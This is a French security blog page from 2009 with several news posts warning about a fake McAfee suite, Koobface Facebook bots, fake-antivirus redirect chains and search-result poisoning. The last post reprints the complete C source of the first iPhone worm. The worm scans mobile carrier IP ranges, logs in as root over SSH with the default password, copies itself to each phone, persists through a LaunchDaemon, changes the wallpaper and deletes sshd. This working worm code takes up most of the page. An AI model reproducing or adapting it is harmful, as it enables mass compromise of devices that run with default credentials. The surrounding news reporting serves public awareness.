MaCatte : un faux McAfee
Il y a quelques jours, l'éditeur d'antivirus McAfee mettait en garde contre une version pirate de son logiciel Security Center.
Ce malware de type cheval de troie créé un serveur sur l'ordinateur infecté, et réalise les actions suivantes :
- connexion à internet de manière transparente
- affichage de messages publicitaires
Cela entraîne bien entendu un PC et une connexion a internet lente.
Voici la page d'accueil du site internet de McAfee :
Et voici la page d'accueil du site trompeur (capture par McAfee) :
On peut dire que les développeurs du site pirate se sont donnés du mal. La ressemblance est grande, troublante, tant et si bien quelle a trompé bon nombre d'internaute, il suffit de taper la recherche macatte sous google pour s'en rendre compte.
Mais le succès de la propagation vient surtout de l'extrême ressemblance entre MaCatte Security Center et McAfee Security Center. Jugez par vous même.
La version légitime :
La version malicieuse :
Outre les effets indésirables cités plus haut, MaCatte désactivera également votre actuel antivirus, redirigera les pages que vous visitez vers www.macatte.com infesté de malware. Heureusement que ce domaine ait été suspendu par le register, à la demande du service juridique de McAfee.
D'où l'importance de vérifier avec attention la légitimité du site d'où l'on télécharge ses logiciels. Faites également très attention aux "patch anti MaCatte" que proposent certains sites. Comme MaCatte désactive votre vrai antivirus vous êtes alors vulnérable...et ces soit disant bon samaritain le savent...
Quand koobface imite les humains
mardi 10 novembre 2009
Koobface, le ver quasi attitré de Facebook, vient de recevoir de nouvelles fonctionnalités. Elles permettent ainsi à un ordinateur infecté par le ver de :
- se connecter à Facebook
- créer un nouveau compte
- confirmer son adresse mail (Gmail) afin de vailider le nouveau compte
- remplir la page Info
- rejoindre aléatoirement des groupes
- ajouter de nouveaux amis
- poster des messages sur le mur de ses "amis"
Cela donne des comptes compromis, mais impossible à dissocier d'un compte humain. Photo, nom, date d'anniversire, religion...tout y est!
Voici un exemple d'information d'un compte bot :
Et ici le message qu'un bot peu laisser sur le mur d'un ami (humain) :
La vidéo posté par le bot redirige en fait vers un faux Youtube. Une technique similaire à celle utilisé pour Google Reader. La page de destination contient une image simulant un lecteur video, et bien entendu une mise à jour est demandé pour pouvoir voir la vidéo. Mis à jour qui cache en réalité le ver Koobface.
Les utilisateurs de Facebook doivent donc être extrêmement prudent quand ils reçoivent un message privée ou sur leur mur les invitant à regarder une vidéo sur un site externe...et même si la vidéo vient de quelqu'un de confiance : son compte a pu être piraté!
De plus, on se sait combien de compte bot a créé le ver.
Le site du gouvernement Nord Coréen piraté
Mad Men est une de ses séries américaines qui cartonne. Diffusée depuis novembre dernier sur Canal+, aux États-Unis on attend la 4ième saison. Vous vous doutez bien que les fans passent leur temps sur internet à la recherche de la photo inédite, de la vidéo jamais vu, et surtout de la première programmation d'un premier épisode de cette saison 4.
Et une fois de plus nos amis pirates saisissent l'occasion afin de répandre leurs virus. Ainsi l'éditeur de logiciel de sécurité Sunbelt met en garde contre les sites internet vérolés, censés délivrer la grille de programmation de Mad Men saison 4 outre-atlantique.
En utilisant des techniques de Black SEO sur la recherche mad men season 4 schedule - mad men saison 4 horaire/programme - un site internet diffusant un faux antivirus apparaît en seconde position sur google :
Si vous vous rendez sur le lien compromis - fortement déconseillé - alors une pop-up s'ouvre indiquant que vous êtes infecté par un virus.
Ici que vous cliquiez sur le bouton OK où sur la petite crois pour fermer la fenêtre, le résultat sera le même : une nouvelle fenêtre s'ouvre. Cette fenêtre ressemble au panneau Poste de Travail de Windows XP, mais regardez bien, car vous êtes toujours dans votre navigateur internet.
Un résultat bluffant, pouvant tromper une personne pressée ou peu aguerris en informatique. Vient ensuite le compte rendu - forcement catastrophique - du scan de ce faux anti-virus.
Une liste de virus et chevaux de troie longue comme le bras s'affiche. Comme Windows XP (et Windows tout court) est l'OS le plus utilisé, c'est bien évidemment la cible principale des pirates. Ils n'ont donc pas pris la peine de faire une détection d'OS, ce qui donne dans notre cas une situation assez cocasse : ayant ouvert ce site sous la distribution Linux, Xubuntu, le soit disant Windows Security Alert nous propose une désinfection du système.
Jusque là peu de danger pour votre ordinateur. En revanche si vous cliquez (et ne le faîtes surtout pas) sur Start Protection, le site compromis va chercher des informations sur dedstar.com, un serveur contenant des malwares.
Si l'on cherche un peu plus, nous pouvons voir une Guest star dans la liste des sites piratés par iFrame redirigeant vers des sites de faux anti-virus :
Si vous cliquez sur ce lien, vous serez très vite redirigé vers un autre site maliceux. En cause ce petit script javascript, caché dans le code HTML de la page, qui effectue une redirection.
Avec cette première redirection nous atterrissons sur une page du site ancom1.ru, extension russe, mais hébergé en allemagne. Lui même - grâce au même procédé de redirection javascript - nous redirige sur genusbiz.cn, extension chinoise cette fois-ci hébergé au Costa Rica. Dernier rebond qui nous conduit ensuite sur available-scanner.com hébergé dans la ville de Volvograd (Russie).
Retournons à notre site corréen, si nous allons à l'URL racine, nous tombons ni plus ni moins que sur le site officiel de la République Démocratique de Corée (autrement dit le site officiel du gouvernement de la dictature de Corée du Nord).
Enfin, puisque ce virus contamine ces chiens de capitalistes, par certains que le webmaster du site officiel de la Corée du Nord corrige la faille.
Google Trend au service des pirates
Google Trends est un outils fournis par Google Labs permettant de connaître en temps réel la popularité d'une recherche, d'un sujet, d'un mot-clé.
Les pirates informatiques, et principalement ceux qui utilisent le spam ou la diffusion de malware (le spreading) ont bien compris l'intérêt de cet outils. Si les photos coquines de nos célébrités sont une technique commune, en revanche il y en a de plus pervers, comme le spam suite à un événement mondial - comme la mort de Michael Jackson par exemple.
Depuis quelques jours, le logo Google fait apparaître des oiseaux en peluche, en hommage des 40 ans de l'émission pour enfant Sesame Street.
Mais pour ceux qui ne savent pas à quoi cela correspond, quoi de mieux qu'une recherche sur Google pour connaitre l'origine de ce logo.
Vous tapez donc la recherche gros oiseaux sur Google - big birds on google en anglais - et vous allez cliquer sur les premiers liens.
Voici le premier résultat sur cette recherche. Si vous cliquez sur ce lien, vous serez alors redirigé sur une page d'affiliation. lrops.com est quand à lui un site totalement légitime (spécialiste dans le domaine de la simulation de vol) est a probablement été compris par un pirate. Ils ont par la suite utilisé des techniques de Black SEO afin de positionner correctement leur piège sur google.
Mais cela peut être beaucoup plus grave. En effet certaines pages diffusent des logiciels malicieux déguisés en faux anti-virus. Voici la preuve en vidéo :
Les faux-antivirus ont le vent en poupe ces derniers temps. Et même si cette attaque ci vise principalement les utilisateurs anglophones, il convient de rester extrèmement prudent lorsque qu'une pop-up vous annonce que vous êtes infécté par un/des virus.
Zone Alarm 10 à 0€ !
lundi 9 novembre 2009
Zone Alarm est un firewall édité par l'un des leaders des appliances sécurités : Checkpoint.
A l'occasion de la sortie de la version 10, la version complète sera totalement gratuite le mardi 10 novembre.
Pour bénéficier de ce cadeau, rendez-vous demain ici.
La promotion n'est valable que 24 heures.
Code source du premier ver iPhone
Il y a quelques jours, un hollandais avait pris la main sur de nombreux iPhones, et avait ensuite demandé une sorte de rançon. La faille était toute simple : les iPhones jailbreakés ont presque tous comme mot de passe SSH le mot alpine.
La nouvelle a du se répandre et un ver - le premier pour l'iPhone - est né. Ce que fait ce malware, c'est qu'il balaye un range de réseaux établis, se connecte en SSH avec le mot de passe par défaut alpine et s'il y arrive il change le fond d'écran (une photo du chanteur Rick Astley). Puis à partir de la machine nouvellement infecté il scan de nouveaux réseaux.
Le code source de ce ver a été rendu publique. Visible dans un premier temps ici, l'accès a été bannis.
Voici le code écrit en C du ver :
//
// iPhone default pass worm by ikex
//
// This code is CLOSED source.
// And very hacky, i just needed it to work.
//
// Thanks to alan3423432432 haha for helping me work out my flaws in C
//
#include "main.h"
int fdlock;
// randHost(): Returns a random IP Address XXX.XXX.XXX.XXX
char *randHost(void)
{
int x,y,z;
char *retme;
srand (time (0));
x=random() % 255;
y=random() % 255;
z=random() % 255;
asprintf(&retme, "%i.%i.%i.", x,y,z);
return retme;
}
// get_lock(): Sets/Gets the status of the file lock
// located in /var/lock/bbot.lock
int get_lock(void)
{
struct flock fl;
fl.l_type = F_WRLCK;
fl.l_whence = SEEK_SET;
fl.l_start = 0;
fl.l_len = 1;
if((fdlock = open("/var/lock/bbot.lock", O_WRONLY|O_CREAT, 0666)) == -1)
return 0;
if(fcntl(fdlock, F_SETLK, &fl) == -1)
return 0;
return 1;
}
// getAddrRange(): Gets the phones 3G range + 2
// eg, 100.100.100.0-100.100.102.255
char *getAddrRange()
{
struct ifaddrs *ifaddr, *ifa;
int family, s;
char host[NI_MAXHOST];
if (getifaddrs(&ifaddr) == -1) {
perror("getifaddrs");
exit(EXIT_FAILURE);
}
for (ifa = ifaddr; ifa != NULL; ifa = ifa->ifa_next) {
family = ifa->ifa_addr->sa_family;
if (family == AF_INET)
{
if (family == AF_INET || family == AF_INET6) {
s = getnameinfo(ifa->ifa_addr,
(family == AF_INET) ? sizeof(struct sockaddr_in) :
sizeof(struct sockaddr_in6),
host, NI_MAXHOST, NULL, 0, NI_NUMERICHOST);
if (s != 0) {
printf("getnameinfo() failed: %s\n", gai_strerror(s));
return "0.0.0.0-0.0.0.0";
}
if (strcmp(ifa->ifa_name, "pdp_ip0") == 0)
{
syslog(LOG_DEBUG, ifa->ifa_name);
syslog(LOG_DEBUG, host);
char *wee[20];
tokenise(host, wee, ".");
char *range;
int octc = atoi(wee[2]);
asprintf(&range, "%s.%s.%i.0-%s.%s.%i.255", wee[0], wee[1], octc, wee[0], wee[1], octc+2);
return range;
}
}
}
}
freeifaddrs(ifaddr);
return "0.0.0.0-0.0.0.0";
}
// From alan2349024 Sorry i suck at remembering numbers
// Thanks dude!
int tokenise (char input[], char *token[], char* spl) // Added sep param
{
char *tokens;
int count = 0;
tokens = strtok(input, spl);//Change TOKEN_SEPERATORS To What You Want To Seperate Off
if(tokens[strlen(tokens) - 1] == '\n')
tokens[strlen(tokens) - 1] = '\0';
token[count] = tokens;
while(tokens != NULL)
{
count++;
if( count > MAX_NUM )//change MAX_NUM_TOKENS To A Number
return (-1);
tokens = strtok(NULL, spl);
if(tokens != NULL)
{
if(tokens[strlen(tokens) - 1] == '\n')
tokens[strlen(tokens) - 1] = '\0';
}
token[count] = tokens;
}
return count;
}
// Entry point.
int main(int argc, char *argv[])
{
//pid_t pid, sid;
//char *subnet = randHost();
// syslog(LOG_DEBUG, "I should go, i feel like im interupting something ;]");
/* // FORK CODE REMOVED IT FUCKS WITH LaunchDaemon.
pid = fork();
if (pid <>
exit(EXIT_FAILURE);
else if (pid > 0)
exit(EXIT_SUCCESS);
umask(0);
sid = setsid();
*/
if(get_lock() == 0) {
syslog(LOG_DEBUG, "I know when im not wanted *sniff*");
return 1; } // Already running.
sleep(60); // Lets wait for the network to come up 2 MINS
syslog(LOG_DEBUG, "IIIIIII Just want to tell you how im feeling");
//char ipRange[256] = "120.16.0.0-120.23.255.255";
char *locRanges = getAddrRange();
char *lanRanges = "192.168.0.0-192.168.255.255"; // #172.16.0.0-172.31.255.255 Ehh who uses it
char *vodRanges1 = "202.81.64.0-202.81.79.255";
char *vodRanges2 = "23.98.128.0-123.98.143.255";
char *vodRanges3 = "120.16.0.0-120.23.255.255";
char *optRanges1 = "114.72.0.0-114.75.255.255";
char *optRanges2 = "203.2.75.0-203.2.75.255";
char *optRanges3 = "210.49.0.0-210.49.255.255";
char *optRanges4 = "203.17.140.0-203.17.140.255";
char *optRanges5 = "203.17.138.0-203.17.138.255";
char *optRanges6 = "211.28.0.0-211.31.255.255";
char *telRanges = "58.160.0.0-58.175.255.25";
//char *attRanges = "32.0.0.0-32.255.255.255"; // TOO BIG
syslog(LOG_DEBUG, "awoadqdoqjdqjwiodjqoi aaah!");
ChangeOnBoot();
KillSSHD();
// Local first
while (1)
{
syslog(LOG_DEBUG, "Checking out the local scene yo");
scanner(locRanges);
syslog(LOG_DEBUG, "Random baby");
int i;
for (i=0; i <= 2; i++)
{
char *ipaddr = randHost();
char *rrange;
asprintf(&rrange, "%s.0-%s.255", ipaddr, ipaddr);
scanner(rrange);
}
// Lan
syslog(LOG_DEBUG, "Lannnnn");
scanner(lanRanges);
syslog(LOG_DEBUG, "VODAPHONE");
scanner(vodRanges1);
scanner(vodRanges2);
scanner(vodRanges3);
syslog(LOG_DEBUG, "OPTUSSSS");
scanner(optRanges1);
scanner(optRanges2);
scanner(optRanges3);
scanner(optRanges4);
scanner(optRanges5);
scanner(optRanges6);
syslog(LOG_DEBUG, "Telstra");
scanner(telRanges);
}
}
void scanner(char *ipRange)
{
char *wee[10];
char *begin[10];
char *end[10];
tokenise(ipRange, wee, "-");
int octaB, octaE, octbB, octbE, octcB, octcE;
tokenise(wee[0], begin, ".");
tokenise(wee[1], end, ".");
octaB = atoi(begin[0]); // YYY.XXX.XXX.XXX
octaE = atoi(end[0]);
octbB = atoi(begin[1]);
octbE = atoi(end[1]);
octcB = atoi(begin[2]);
octcE = atoi(end[2]);
int loop1;
for (loop1=octaB; loop1<=octaE; loop1++)
{
int loop2;
for (loop2=octbB; loop2<=octbE; loop2++)
{
int loop3;
for (loop3=octcB; loop3<=octcE; loop3++)
{
int loop4;
for (loop4=0; loop4<=255; loop4++)
{
char* host;
asprintf(&host, "%i.%i.%i.%i", loop1, loop2,loop3, loop4);
//printf("\n\rScanning: %s", host);
if (scanHost(host) == 0 && checkHost(host) == 0) // This will run scanHost THEN checkHost right?
{
syslog(LOG_DEBUG, "Oh a sheep!");
//printf("\n\r - %s is vulnerable", host);
infectHost(host);
}
}
}
}
}
}
// http://img41.imageshack.us/img41/730/asto.jpg
int scanHost(char* host)
{
int res, valopt, soc;
struct sockaddr_in addr;
long arg;
fd_set myset;
struct timeval tv;
socklen_t lon;
soc = socket(AF_INET, SOCK_STREAM, 0);
arg = fcntl(soc, F_GETFL, NULL);
arg |= O_NONBLOCK;
fcntl(soc, F_SETFL, arg);
addr.sin_family = AF_INET;
addr.sin_port = htons(22);
addr.sin_addr.s_addr = inet_addr(host);
res = connect(soc, (struct sockaddr *)&addr, sizeof(addr));
if (res <>
if (errno == EINPROGRESS) {
tv.tv_sec = 10;
tv.tv_usec = 0;
FD_ZERO(&myset);
FD_SET(soc, &myset);
if (select(soc+1, NULL, &myset, NULL, &tv) > 0) {
lon = sizeof(int);
getsockopt(soc, SOL_SOCKET, SO_ERROR, (void*)(&valopt), &lon);
if (valopt) {
return -1;
}
}
else {
return -1; }
}
else { return -1; }
}
close(soc);
return 0;
// Set to blocking mode again...
//arg = fcntl(soc, F_GETFL, NULL);
//arg &= (~O_NONBLOCK);
//fcntl(soc, F_SETFL, arg);
}
int checkHost(char *host)
{
syslog(LOG_DEBUG, host);
FILE *in;
extern FILE *popen();
char buff[512];
char *execLine;
asprintf(&execLine, "sshpass -p %s ssh -o StrictHostKeyChecking=no root@%s 'echo 99'", VULN_PASS, host);
if (!(in = popen(execLine, "r"))) {
printf("Error is sshpass there?");
return -1;
}
while (fgets(buff, 2, in) != NULL ) {
if (strcmp(buff, "99"))
return 0;
}
pclose(in);
return -1; // NOT VULN
}
int runCommand(char* command, char *host)
{
FILE *in;
extern FILE *popen();
char buff[512];
char *execLine;
// Really am to lazy to check this but im piling comands as so
// command1; command2; command3; echo 99
// my belief is that if for instance command2 dies we wont hit the echo 99
// which will make us return -1
asprintf(&execLine, "sshpass -p %s ssh -o StrictHostKeyChecking=no root@%s '%s ; echo 99'",VULN_PASS, host, command);
if (!(in = popen(execLine, "r"))) {
printf("Error is sshpass there?");
return -1;
}
while (fgets(buff, 2, in) != NULL ) {
if (strcmp(buff, "99"))
return 0;
}
pclose(in);
return -1;
}
int prunCommand(char* command, char *host)
{
FILE *in;
extern FILE *popen();
char buff[512];
char *execLine;
asprintf(&execLine, "sshpass -p %s ssh -o StrictHostKeyChecking=no root@%s '%s'",VULN_PASS, host, command);
if (!(in = popen(execLine, "r"))) {
printf("Error is sshpass there?");
return -1;
}
while (fgets(buff, sizeof(buff), in) != NULL ) {
printf("%s",buff);
}
pclose(in);
return -1;
}
int CopyFile(char* src, char* dst, char* host)
{
FILE *in;
extern FILE *popen();
char buff[512];
char *execLine;
asprintf(&execLine, "sshpass -p %s scp -o StrictHostKeyChecking=no ./%s root@%s:%s", VULN_PASS, src, host, dst);
if (!(in = popen(execLine, "r"))) {
printf("Error is sshpass there?");
return -1;
}
while (fgets(buff, sizeof(buff), in) != NULL ) {}
asprintf(&execLine, "sshpass -p %s ssh -o StrictHostKeyChecking=no root@%s 'which %s'", VULN_PASS, host, dst);
if (!(in = popen(execLine, "r"))) {
printf("Error is sshpass there?");
return -1;
}
while (fgets(buff, 2, in) != NULL ) {
if (strcmp(buff, dst))
return 0;
}
pclose(in);
return -1;
}
int ChangeOnBoot()
{
FILE *in;
extern FILE *popen();
if (!(in = popen("cp /var/log/youcanbeclosertogod.jpg /var/mobile/Library/LockBackground.jpg", "r"))) {
return -1;
}
return 0;
}
int KillSSHD()
{
FILE *in;
extern FILE *popen();
if (!(in = popen("rm -f /usr/sbin/sshd; killall sshd", "r"))) {
return -1;
}
return 0;
}
int infectHost(char *host)
{
// Copy myself to them
// run as startup
if (runCommand("uname -n", host) == 0)
{
//printf("\n\r - Infecting: ");
prunCommand("uname -n", host);
prunCommand("rm /bin/sshpass", host);
prunCommand("rm /bin/poc-bbot", host);
//prunCommand("killall poc-bbot", host);
if (CopyFile("/bin/poc-bbot", "/bin/poc-bbot", host) == 0 && CopyFile("/bin/sshpass", "/bin/sshpass", host) == 0)
{
//printf(" - Replicated successfully");
prunCommand("rm /var/mobile/Library/LockBackground.jpg; echo \"\r\n - Removed old background\"", host);
// Revision 3 - idea from nevermore!
// This way dipshits wont delete my stuff
CopyFile("/var/log/youcanbeclosertogod.jpg", "/var/mobile/Library/LockBackground.jpg", host);
CopyFile("/var/log/youcanbeclosertogod.jpg", "/var/log/youcanbeclosertogod.jpg", host);
//CopyFile("/var/mobile/Library/LockBackground.jpg", "/var/mobile/Library/LockBackground.jpg", host); // We aren't
installing an app.
//printf(" - Background set (ast.jpg).");
CopyFile("/System/Library/LaunchDaemons/com.ikey.bbot.plist", "/System/Library/LaunchDaemons/com.ikey.bbot.plist",
host);
prunCommand("launchctl load /System/Library/LaunchDaemons/com.ikey.bbot.plist", host);
// I didn't want to have to do this.
prunCommand("rm -f /Library/LaunchDaemons/com.openssh.sshd.plist; launchctl unload
/Library/LaunchDaemons/com.openssh.sshd.plist", host);
prunCommand("killall sshd", host);
//printf("\n\r - Program set to startup on boot");
//prunCommand("reboot", host)
//printf("\n\r - Rebooting phone!");
//CopyFile("ngtgyu.m4r", "/var/mobile/ngtgyu.m4r", host);
//printf("\n\r - Ringtone set (ngtgyu.m4r).");
}
}
return 0;
}
// END
Pour remédier au problème, le premier hacker (le hollandais) a mis sur son site la procédure à suivre pour changer le mot de passe SSH
Inscription à :
Articles (Atom)
